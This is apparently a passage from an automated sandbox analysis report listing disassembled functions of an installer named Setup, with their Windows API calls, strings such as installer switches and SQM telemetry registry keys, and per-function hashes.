                                                                                              • Instruction Fuzzy Hash: B211A572751301AFE734DF35DA16B2A7BF4AB00754F10892DE207DAAD0DBB4E5448B44

                                                                                              Non-executed Functions

                                                                                              Function 6C5D4281 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 270filethreadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5D42CF
                                                                                                • Part of subcall function 6C5D443B: LoadLibraryW.KERNEL32(SensApi.dll,00000000,?), ref: 6C5D4452
                                                                                                • Part of subcall function 6C5D443B: GetProcAddress.KERNEL32(00000000,IsNetworkAlive), ref: 6C5D4468
                                                                                                • Part of subcall function 6C5D443B: FreeLibrary.KERNEL32(00000000), ref: 6C5D447F
                                                                                                • Part of subcall function 6C5D3E29: RegOpenKeyExW.ADVAPI32(?,?,00000000,-00020018,00000000,80000002,CEIPEnable,00000002), ref: 6C5D3E94
                                                                                                • Part of subcall function 6C5D3E29: RegQueryValueExW.ADVAPI32(00000000,00000002,00000000,?,?,00000004), ref: 6C5D3EB0
                                                                                                • Part of subcall function 6C5D3E29: RegCloseKey.ADVAPI32(00000000), ref: 6C5D3ECE
                                                                                              • EnterCriticalSection.KERNEL32(00000030,?,00000104,?,80000002,Software\Microsoft\SQMClient,DoNotDeleteFileAfterUpload,?,00000000,?,6C5F0168), ref: 6C5D434C
                                                                                              • FindFirstFileW.KERNEL32(?,?,?,6C5F0168), ref: 6C5D4392
                                                                                              • LeaveCriticalSection.KERNEL32(?,?,6C5F0168), ref: 6C5D43CD
                                                                                              • ctype.LIBCPMT ref: 6C5D43F5
                                                                                              • FindNextFileW.KERNEL32(?,00000010,?,6C5F0168), ref: 6C5DB9A3
                                                                                              • FindClose.KERNEL32(?,?,6C5F0168), ref: 6C5DB9BD
                                                                                              • ResetEvent.KERNEL32(?,?,6C5F0168), ref: 6C5DB9DD
                                                                                              • CreateThread.KERNEL32(00000000,00000000,6C5DBC8D,00000000,00000000,00000054), ref: 6C5DB9FB
                                                                                                • Part of subcall function 6C5DB850: realloc.MSVCRT ref: 6C5DB88E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseCriticalFileLibrarySection$AddressCreateEnterEventFirstFreeLeaveLoadNextOpenProcQueryResetThreadValuectypememsetrealloc
                                                                                              • String ID: DoNotDeleteFileAfterUpload$Software\Microsoft\SQMClient$W
                                                                                              • API String ID: 746345222-799691104
                                                                                              • Opcode ID: fa326b21fe891e0b2c22720e0af9a182a8f312d1ef63a434e43c85b9b1667073
                                                                                              • Instruction ID: 70ccea867fb42956c5d8b6fea1a83bd7f69d96f095f751d12d05567e582d8bdc
                                                                                              • Opcode Fuzzy Hash: fa326b21fe891e0b2c22720e0af9a182a8f312d1ef63a434e43c85b9b1667073
                                                                                              • Instruction Fuzzy Hash: 7EB1B0B0500399DFCB50DF28CC84F9AB7B5BB49308F5205AAE628D6A61D731ED84CF48
                                                                                              Function 6C5E8097 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 166fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5E80D6
                                                                                              • memset.MSVCRT ref: 6C5E80EF
                                                                                                • Part of subcall function 6C5D18E5: _vsnwprintf.MSVCRT ref: 6C5D1913
                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,1000FFFF,00000000), ref: 6C5E81D8
                                                                                                • Part of subcall function 6C5E99F8: EtwTraceMessage.NTDLL ref: 6C5E9A13
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$FileFindFirstMessageTrace_vsnwprintf
                                                                                              • String ID: %s\%s$W
                                                                                              • API String ID: 675349215-3036690452
                                                                                              • Opcode ID: 8b5d50bec31e19970d4fb3d80b1eeaf3aa67da4cde0c90e7fe580bf3b7c8c630
                                                                                              • Instruction ID: a907f1a6f96c9472000dc37bb051537a2979d0f81e6b89b0e62cddd920b509ee
                                                                                              • Opcode Fuzzy Hash: 8b5d50bec31e19970d4fb3d80b1eeaf3aa67da4cde0c90e7fe580bf3b7c8c630
                                                                                              • Instruction Fuzzy Hash: AD51C2B0940258EFCB14CF58CC84F9B7BB9AB49308F5501D6E515E69A2D331DD88CF5A
                                                                                              Function 6396681A Relevance: 10.5, APIs: 7, Instructions: 34windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63966821
                                                                                              • GetLastError.KERNEL32(00000008,639650A0,?,00000000,00000000,?,?,63958DC8,?,%1!I64u!,?,?), ref: 63966834
                                                                                              • SetLastError.KERNEL32(00000000,?,63958DC8,?,%1!I64u!,?,?), ref: 63966840
                                                                                              • FormatMessageW.KERNEL32(00000500,00000000,00000000,00000000,205ABF9D,00000000,205ABF9D,?,63958DC8,?,%1!I64u!,?,?), ref: 63966854
                                                                                              • GetLastError.KERNEL32(?,63958DC8,?,%1!I64u!,?,?), ref: 6396685A
                                                                                              • SetLastError.KERNEL32(?,?,63958DC8,?,%1!I64u!,?,?), ref: 63966868
                                                                                              • LocalFree.KERNEL32(205ABF9D,?,205ABF9D,?,63958DC8,?,%1!I64u!,?,?), ref: 63966878
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$FormatFreeH_prolog3LocalMessage
                                                                                              • String ID:
                                                                                              • API String ID: 69132360-0
                                                                                              • Opcode ID: 695db9bddde587e62958a90f4067b3cf19ef87ef52e9ec2be88e5c7a6d84662b
                                                                                              • Instruction ID: aa2aff5e8836b40531b1732cdb618900b05c3ba8efb0996820ad288bdb9c9bf3
                                                                                              • Opcode Fuzzy Hash: 695db9bddde587e62958a90f4067b3cf19ef87ef52e9ec2be88e5c7a6d84662b
                                                                                              • Instruction Fuzzy Hash: ACF0F931804259EFDF10BFA6CD44DAFBF79FFA6B45F00401AA510A60A1CB718921DF61
                                                                                              Function 639687C1 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 6396AEFE
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6396AF13
                                                                                              • UnhandledExceptionFilter.KERNEL32(63941540), ref: 6396AF1E
                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 6396AF3A
                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 6396AF41
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 2579439406-0
                                                                                              • Opcode ID: 6c206577d15600410268c7b041ff2451586976b99d6768ecade77c791a995895
                                                                                              • Instruction ID: 86f8facd7d03ba7673dd61b47e1791eba2b0d633f49bca73d05b0ff387387624
                                                                                              • Opcode Fuzzy Hash: 6c206577d15600410268c7b041ff2451586976b99d6768ecade77c791a995895
                                                                                              • Instruction Fuzzy Hash: 1F21CEB888A3049FDB05FF65D4686443BF4FB8B305F10581AE8898B342E7B196808F55
                                                                                              Function 6394EFE2 Relevance: 7.5, APIs: 5, Instructions: 49processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6394EFFE
                                                                                              • _memset.LIBCMT ref: 6394F018
                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 6394F032
                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 6394F04D
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 6394F061
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
                                                                                              • String ID:
                                                                                              • API String ID: 2526126748-0
                                                                                              • Opcode ID: 61abf4132bedaa628240f7036c0f0ca82ecf2d71bbb79c69b1d9a5df6909e42b
                                                                                              • Instruction ID: cec45905bc4244fdd566009adfac992c28238ab20b1f768f0369d24d12117d31
                                                                                              • Opcode Fuzzy Hash: 61abf4132bedaa628240f7036c0f0ca82ecf2d71bbb79c69b1d9a5df6909e42b
                                                                                              • Instruction Fuzzy Hash: 3901CC31902028AFDB10EB65D88CEAE7BB8EB87B58F400195E816D7181CB70DA45CEA1
                                                                                              Function 6C5D171F Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6C5EA4E6
                                                                                              • UnhandledExceptionFilter.KERNEL32(6C5EA50C), ref: 6C5EA4F1
                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 6C5EA4FC
                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 6C5EA503
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 3231755760-0
                                                                                              • Opcode ID: bf4f98b3e34cd31425ead02703af0e1b73b2d33b92f2d4979a0f34c70456a9d1
                                                                                              • Instruction ID: ef7575115a552d2cb967b642780551603d10ff0b9fb7b3ec90fa40374710301e
                                                                                              • Opcode Fuzzy Hash: bf4f98b3e34cd31425ead02703af0e1b73b2d33b92f2d4979a0f34c70456a9d1
                                                                                              • Instruction Fuzzy Hash: E121BFB4A063859FCF49EF19EC85A457BB4BB8A324B9A811BE429C3350E7709540CF2C
                                                                                              Function 63967A10 Relevance: 4.5, APIs: 3, Instructions: 40COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadResource.KERNEL32(?,?,?,?,6395F053,?,00000000,?,6395F018,00000000,?,00000000,?,?), ref: 63967A1E
                                                                                              • LockResource.KERNEL32(00000000,63982F8C,?,6395F053,?,00000000,?,6395F018,00000000,?,00000000,?,?), ref: 63967A2A
                                                                                              • SizeofResource.KERNEL32(?,?,?,6395F053,?,00000000,?,6395F018,00000000,?,00000000,?,?), ref: 63967A3C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Resource$LoadLockSizeof
                                                                                              • String ID:
                                                                                              • API String ID: 2853612939-0
                                                                                              • Opcode ID: 4d8f0885f354786ceea67ec516483c9618f79375ef121717b049c5ddde898f72
                                                                                              • Instruction ID: 19fa1bc634891cd215b94a060bca40e43102cee11e4d064529ef59b7fa522ee1
                                                                                              • Opcode Fuzzy Hash: 4d8f0885f354786ceea67ec516483c9618f79375ef121717b049c5ddde898f72
                                                                                              • Instruction Fuzzy Hash: DFF0F633211016ABBF112B2ACC048797BAAEBC3BA13098426F818D6100E732C670DEA0
                                                                                              Function 6C5EDE44 Relevance: .0, Instructions: 41COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 74b5f1cc7ec8c357c34dc84f79a000ff659a75e498c54a868e1ae8fc38274e75
                                                                                              • Instruction ID: 955c80c0af15451080ba75e3d557239c266114de0625dc4045f582fd4f1097e7
                                                                                              • Opcode Fuzzy Hash: 74b5f1cc7ec8c357c34dc84f79a000ff659a75e498c54a868e1ae8fc38274e75
                                                                                              • Instruction Fuzzy Hash: 37F054345093468FC7018B34885585AFBB19F8B16470595978446CF962D534EC898755
                                                                                              Function 6394BE03 Relevance: 31.7, APIs: 1, Strings: 17, Instructions: 220COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6394BE0A
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 6395F35E: __EH_prolog3.LIBCMT ref: 6395F365
                                                                                                • Part of subcall function 6395F35E: __recalloc.LIBCMT ref: 6395F3A7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$__recalloc
                                                                                              • String ID: CEIPconsent$NoSetupVersionCheck$chainingpackage$createlayout$lcid$log$msioptions$norestart$parameterfolder$passive$pipe$promptrestart$repair$serialdownload$showfinalerror$uninstall$uninstallpatch
                                                                                              • API String ID: 1900422986-634121796
                                                                                              • Opcode ID: 526fd40aa0519b7680617d8f43f02707d097a82e2ee930527c1e83e1d648515f
                                                                                              • Instruction ID: ddd03d7fe401b907ac51995177a55f6d7a821ca84f2ab2d568a5fcd620da7379
                                                                                              • Opcode Fuzzy Hash: 526fd40aa0519b7680617d8f43f02707d097a82e2ee930527c1e83e1d648515f
                                                                                              • Instruction Fuzzy Hash: 05A117B180535DDBEB11D7F8C9806EDB7B4AF2672CF184588E024A3282D775D6989F32
                                                                                              Function 6395D149 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 114windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6395D150
                                                                                                • Part of subcall function 6394C419: __EH_prolog3.LIBCMT ref: 6394C420
                                                                                                • Part of subcall function 6394C419: GetModuleFileNameW.KERNEL32(63940000,00000010,00000104), ref: 6394C46D
                                                                                                • Part of subcall function 6395F21D: PathAppendW.SHLWAPI(00000000,00000000,?,00000105,?,?,80070057,80070057,6394C3AE), ref: 6395F241
                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000020,00000020,00000010), ref: 6395D198
                                                                                              • SendMessageW.USER32(?,00000080,00000001,00000000), ref: 6395D1AF
                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000020,00000020,00000010), ref: 6395D1E4
                                                                                              • GetDlgItem.USER32(?,00000068), ref: 6395D1F5
                                                                                              • SendMessageW.USER32(00000000,00000170,?,00000000), ref: 6395D209
                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 6395D231
                                                                                              • GetDlgItem.USER32(?,00000069), ref: 6395D242
                                                                                              • SendMessageW.USER32(00000000,000000F7,00000001,?), ref: 6395D256
                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 6395D27E
                                                                                              • GetDlgItem.USER32(?,0000006A), ref: 6395D28F
                                                                                              • SendMessageW.USER32(00000000,000000F7,00000001,?), ref: 6395D2A3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ImageLoadMessageSend$Item$H_prolog3$AppendFileModuleNamePath
                                                                                              • String ID: graphics\setup.ico$print.ico$save.ico$stop.ico$warn.ico
                                                                                              • API String ID: 1194837009-3827646805
                                                                                              • Opcode ID: 6fb6e422a4a0a88f874a09be866ae824d3216167440ac1c935d55fa3a2677ed6
                                                                                              • Instruction ID: a97210b1cd7547406ec8915121c286c02e6691980646e38f1dfce2bccf25f707
                                                                                              • Opcode Fuzzy Hash: 6fb6e422a4a0a88f874a09be866ae824d3216167440ac1c935d55fa3a2677ed6
                                                                                              • Instruction Fuzzy Hash: 59413E7564470AAFEF20ABA0CC46FAA77A9BF05F14F000815F266AA1D1DBB1E4609F10
                                                                                              Function 6395A80E Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 201windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6395A815
                                                                                              • GetDlgItem.USER32(?,00000065), ref: 6395A87D
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 6395A885
                                                                                              • GetDlgItem.USER32(?,00000069), ref: 6395A8AD
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 6395A8B5
                                                                                              • PostMessageW.USER32(?,00000691,80004005,00000000), ref: 6395A8E9
                                                                                              • PostMessageW.USER32(?,00000691,77777777,00000000), ref: 6395A944
                                                                                              • GetParent.USER32(00000002), ref: 6395A9F5
                                                                                              • GetParent.USER32(00000002), ref: 6395AA0B
                                                                                              • SetWindowLongW.USER32(00000002,000000F4,0000006A), ref: 6395AA35
                                                                                              • GetParent.USER32(00000002), ref: 6395AA40
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 6395AA48
                                                                                              • PostMessageW.USER32(00000002,000006F5,00000000,00000000), ref: 6395AA59
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$MessageParentPostText$Item$H_prolog3Long
                                                                                              • String ID: All buttons hidden in passive mode$wwww
                                                                                              • API String ID: 3938074132-3958308462
                                                                                              • Opcode ID: 6addeff4260855a9b05cd14a5bbbf60fd32c78ff78280ddeaf6710b09bd9484c
                                                                                              • Instruction ID: 667f0c8e95ac36903b3fffb25b96dc0b67f6f440eabae4af1b9c11d4a9a11ecb
                                                                                              • Opcode Fuzzy Hash: 6addeff4260855a9b05cd14a5bbbf60fd32c78ff78280ddeaf6710b09bd9484c
                                                                                              • Instruction Fuzzy Hash: 99817D75600606DFDB04EFA4C888A9DBBB5FF0AB18F140558F655AB2A1CB31EC25CF91
                                                                                              Function 6C5E66A1 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 174fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,80000080,00000000), ref: 6C5E672A
                                                                                              • GetLastError.KERNEL32 ref: 6C5E6738
                                                                                                • Part of subcall function 6C5E5F11: EtwTraceMessage.NTDLL ref: 6C5E5F26
                                                                                              • CreateFileMappingW.KERNEL32(00000000,00000000,00000004,00000000,00000078,00000000), ref: 6C5E677E
                                                                                              • GetLastError.KERNEL32 ref: 6C5E678B
                                                                                                • Part of subcall function 6C5E99F8: EtwTraceMessage.NTDLL ref: 6C5E9A13
                                                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000078), ref: 6C5E67CC
                                                                                              • GetLastError.KERNEL32 ref: 6C5E67D8
                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 6C5E68A7
                                                                                              • CloseHandle.KERNEL32(?), ref: 6C5E68BB
                                                                                              • CloseHandle.KERNEL32(?), ref: 6C5E68C0
                                                                                              • SetLastError.KERNEL32(00000000), ref: 6C5E68C4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLast$CloseCreateHandleMessageTraceView$MappingUnmap
                                                                                              • String ID: MSQM
                                                                                              • API String ID: 3767376415-2366479917
                                                                                              • Opcode ID: f980144b8ec9b65ebcfcecfa98fb79c246e0b6ed976cf8004bb4c98fd6dd2b24
                                                                                              • Instruction ID: 4c7db412a4fa23db955ad5a41fcd75cb358d049da76e8b1a4b9463647d73ec75
                                                                                              • Opcode Fuzzy Hash: f980144b8ec9b65ebcfcecfa98fb79c246e0b6ed976cf8004bb4c98fd6dd2b24
                                                                                              • Instruction Fuzzy Hash: 7C513331604348AFDB449F62CC94F8E3BF9BB49388F550465FA21DA9A1CB70D8858F14
                                                                                              Function 6394E153 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 163COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 6394E179
                                                                                              • GetParent.USER32 ref: 6394E18B
                                                                                              • GetWindow.USER32(?,00000004), ref: 6394E197
                                                                                              • GetWindowRect.USER32(?,?), ref: 6394E1A5
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 6394E1BB
                                                                                              • MonitorFromWindow.USER32(?,00000002), ref: 6394E1DA
                                                                                              • GetMonitorInfoW.USER32(00000000,?), ref: 6394E1F7
                                                                                              • GetWindowRect.USER32(?,?), ref: 6394E220
                                                                                              • SetWindowPos.USER32(?,00000000,?,?,000000FF,000000FF,00000015,?,00000000,?,00000002,?,?,?,?,?), ref: 6394E2C7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$LongMonitorRect$FromInfoParent
                                                                                              • String ID: (
                                                                                              • API String ID: 1468510684-3887548279
